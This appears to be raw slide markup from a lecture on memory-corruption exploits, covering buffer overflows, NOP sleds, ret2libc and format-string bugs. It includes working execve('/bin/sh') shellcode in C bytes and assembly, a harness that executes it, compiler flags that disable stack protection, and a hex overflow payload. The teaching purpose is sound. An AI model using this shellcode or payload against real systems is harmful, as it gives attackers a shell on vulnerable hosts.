                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="da-DK" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p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[] = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>              "\x73\x68\x68\x2f\x62\x69\x6e\x89"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>              "\xe3\xb0\x0b\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x80";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="da-DK" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p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main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>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argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> **</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> ("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Shellcode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length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> : %d bytes\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> (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));</a:t>
            </a:r>
          </a:p>
          <a:p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(*f)()=(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(*)())</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> f();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK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810000" y="5093532"/>
            <a:ext cx="4422789" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="snip1Rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gcc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-o shellcode -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-stack-protector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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execstack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shellcode.c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92875"/>
            <a:ext cx="771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Author: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>kernel_panik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>www.shell-storm.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>/files/shellcode-752.php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1295400"/>
            <a:ext cx="3276600" cy="4343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/>
              <a:t>xor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en-US" sz="2800" dirty="0"/>
              <a:t>push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="2800" dirty="0"/>
              <a:t>push 0x68732f2f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>push 0x6e69622f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esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sk-SK" sz="2800" dirty="0"/>
              <a:t>mov al, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="2800" dirty="0" smtClean="0"/>
              <a:t>0xb</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2800" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2800" dirty="0"/>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p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712767"/>
            <a:ext cx="144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Shellcode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45525"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6720396" y="1597967"/>
          <a:ext cx="1143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0x68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0x73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0x2f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0x2f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0x6e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0x69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0x62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0x2f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5369279"/>
            <a:ext cx="63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esp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13312"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7924800" y="1597967"/>
          <a:ext cx="1143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0x0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s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accent5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/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2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78810"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4038600" y="3124200"/>
          <a:ext cx="200406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3"/>
                <a:gridCol w="10020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ebx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esp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ecx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eax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0x0b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6124616" y="5600112"/>
            <a:ext cx="595780" cy="3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2342" y="4569767"/>
            <a:ext cx="150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Registers</a:t>
            </a:r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5031432"/>
            <a:ext cx="1600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7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6388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Factors affecting the stack frame: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tatically declared buffers may be padded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hat about space for callee-save </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>regs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[advanced] what if some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>vars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> are in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>regs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> only?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>[advanced] what if compiler reorders</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>local variables on stack?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> is your friend!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>google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gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t> quick reference)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Don’t just brute force or guess offsets.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Think!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39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nop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41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WARNING:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Environment changes address of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>buf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$ OLDPWD=“” ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>vs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>$ OLDPWD=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>aaaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vuln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81333"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6838918" y="1479548"/>
          <a:ext cx="1461558" cy="4665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env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7271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4876800" y="2514600"/>
            <a:ext cx="1600200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 64078"/>
              <a:gd name="adj2" fmla="val -80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Overwrite with any position in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> slide ok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76800" y="3702440"/>
            <a:ext cx="3423676" cy="1707760"/>
            <a:chOff x="4876800" y="3702440"/>
            <a:chExt cx="3423676" cy="1707760"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6838918" y="4480120"/>
              <a:ext cx="1461558" cy="9144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0x90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0x90</a:t>
              </a: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6324600" y="4495800"/>
              <a:ext cx="381000" cy="914400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876800" y="4800600"/>
              <a:ext cx="1219200" cy="609600"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 74365"/>
                <a:gd name="adj2" fmla="val -23953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nop</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> slide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8918" y="3702440"/>
              <a:ext cx="1461558" cy="762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execve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nip Single Corner Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="5181599"/>
            <a:ext cx="3810000" cy="1311275"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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err="1" smtClean="0"/>
              <a:t>Protip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>: Inserting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>nops</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(e.g., 0x90) into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>allows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>for slack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73509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246823"/>
            <a:ext cx="8839200" cy="48013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iwconfig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accesspoint</a:t>
            </a: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iwconfig</a:t>
            </a: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4685" y="351949"/>
            <a:ext cx="874230" cy="4086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mbria"/>
              </a:rPr>
              <a:t>OK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2743200" y="103821"/>
            <a:ext cx="457200" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrac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781" y="1981065"/>
            <a:ext cx="4029638" cy="36933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01ad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0101 0101 0101 0101 0101 0101 </a:t>
            </a:r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0101 0101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0101 0101 0101 0101 0101 0101 </a:t>
            </a:r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0101 0101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0101 fce8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>bfff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 0101 0101 0101 </a:t>
            </a:r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0101 0101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0101 0101 0101 0101 0101 0101 </a:t>
            </a:r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0101 0101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0101 0101 3101 50c0 2f68 732f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>6868 622f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>6e69 e389 5350 e189 d231 0bb0 80cd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524002" y="5818823"/>
            <a:ext cx="2113515" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -96733"/>
              <a:gd name="adj2" fmla="val -42435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mbria"/>
              </a:rPr>
              <a:t>Superuser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="wifi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26" y="19061"/>
            <a:ext cx="1608834" cy="15411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ight Brace 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="3848103" y="-216821"/>
            <a:ext cx="457200" cy="4038600"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 78772"/>
            </a:avLst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3112" y="1039265"/>
            <a:ext cx="1600200" cy="5029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mbria"/>
              </a:rPr>
              <a:t>Exploit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3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8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Protip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 1: Use existing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get reasonably far without writing your own shellcode. Focus on the basics before custom shellcode.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possible, modify instead of writing from scratch.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1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Protip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 2: Reuse code </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(ret2text or ret2libc)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Return to existing code in .text is usually easier and more stable than ret2buf.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659051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execme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(char *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system(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void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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[512];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[1]);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2895600"/>
            <a:ext cx="3581400" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -97002"/>
              <a:gd name="adj2" fmla="val -4235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return to address of this function instead of injecting code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184960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generate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> for a basic buffer overflow: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Determine size of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stack frame up to head of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Overflow buffer with the right size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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>omputation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>                     +                          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>control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82880"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1028700" y="3612196"/>
          <a:ext cx="70866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/>
                <a:gridCol w="2209800"/>
                <a:gridCol w="1104900"/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>
            <a:off x="1028700" y="3688396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Attacks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6328" y="4267200"/>
            <a:ext cx="423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Resource:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Exploiting Format String Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>scut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> / Team </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Teso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34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i="1" dirty="0"/>
              <a:t>If an attacker is able to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>provide the format </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>an ANSI C format function in part or as a whole, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>format string vulnerability is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>present.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>scut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/team </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>teso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Channeling Vulnerabilities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007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... arise when control and data</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>are mixed into one channel. </a:t>
            </a:r>
          </a:p>
          <a:p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37392"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="558624" y="3161490"/>
          <a:ext cx="8026752" cy="2392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6688"/>
                <a:gridCol w="2006688"/>
                <a:gridCol w="2006688"/>
                <a:gridCol w="2006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r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean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Disclose</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> or write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malloc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> buffers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 metadata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hijack/write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hijack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Phreaking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Voice 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Operator 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Seize</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> line 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Don’t abuse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981201"/>
            <a:ext cx="4040188" cy="17912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wrong(char *user)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latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(user);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17912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ok(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char *user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latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(“%s”, user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4724400" y="4114800"/>
            <a:ext cx="3962400" cy="1726347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cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Alternatives: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fputs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(user,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stdout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puts(user) //newline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format strings, and more generally variadic functions, are implemented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Educational merit: Re-enforces reasoning about stack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to exploit format string vulnerabilities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Functions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388468"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="3500120"/>
          <a:ext cx="82296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242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to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>stdout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fprintf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to a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FILE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>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sprintf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to a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vfprintf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to a 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FILE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t> stream from </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>va_list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syslog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 a message to the system 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setproctitle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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>argv</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>[0]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72571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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, ...)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682924" y="2556760"/>
            <a:ext cx="2355676" cy="659260"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50135"/>
              <a:gd name="adj2" fmla="val -10220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Specifies number and types of arguments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40524" y="2556760"/>
            <a:ext cx="2355676" cy="659260"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -65928"/>
              <a:gd name="adj2" fmla="val -10474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non-</a:t>
            </a:r>
            <a:r>
